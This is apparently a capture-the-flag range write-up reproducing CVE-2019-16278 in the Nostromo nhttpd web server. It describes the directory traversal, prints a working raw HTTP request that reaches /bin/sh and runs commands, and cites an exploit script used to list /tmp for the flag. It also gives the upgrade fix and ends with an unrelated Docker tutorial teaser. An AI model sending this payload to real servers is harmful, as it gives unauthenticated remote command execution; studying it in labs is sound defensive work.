[vulfocus range reproduction] Nostromo remote command execution (cve-2019-16278)

Time:2022-1-8

Vulnerability introduction

Nostromo nhttpd is an open source web server. Nostromo has defects in verifying URL security, resulting in directory traversal. Anyone can traverse any file in the system. Therefore, a remote unauthenticated attacker can force the server to point to a shell file such as / bin / sh, thereby executing arbitrary commands.

Impact version

nhttpd:version <= 1.9.6

Problem solving process

1. Launch range environment

2. Burp suite packet capture verification POC

POC

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25
 
echo
echo
ifconfig 2>&1

3. Script utilization

Script address:https://github.com/jas502n/CVE-2019-16278

./CVE-2019-16278. SH IP address port ID

After successful use, you can also test other commands. I won’t waste time here. I can finally get the flag command directly. Other commands can be understood by myself.

Friends who have worked in the vulfocus shooting range before know that the flag is in the / tmp directory, so let’s go directly to the TMP directory to find the flag.

./CVE-2019-16278. SH IP address port number "CD / tmp&&ls"

Successfully obtained flag

Solution

Upgrade to the latest version 1.9.7

http://www.nazgul.ch/dev/nostromo-1.9.7.tar.gz

Recommended Today

The whole tutorial of docker installation and use, installation / complete command / dockerfile image production / docker container arrangement and one click installation of nginx + redis + MySQL / visualizer portal (version 2022)

官网: https://docs.docker.com/ 官网: https://www.docker.com/ docker 镜像市场: https://hub.docker.com/ 一、docker 说明 1.1、docker 核心 1、Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源,Docker 是一个 CS 架构软件。 2、Docker 是一个虚拟化轻量级linux服务器,可以解决我们在开发环境中运行配置问题 3.、Docker的主要目标是‘build ,ship and run any app,anywhere’,一次封装,到处运行 4、容器是完全使用沙箱机制,相互之间不会有任何接口(类似 iPhone 的 app),更重要的是容器性能开销极低。 1.2、docker 版本问题 .Docker 从 17.03 版本之后分为 CE(Community Edition: 社区版) 和 EE(Enterprise Edition: 企业版),我们用社区版就可以了。 1.3、docker 架构( 3大核心) · 1、Images 镜像 (等于软件) · 2、Registry […]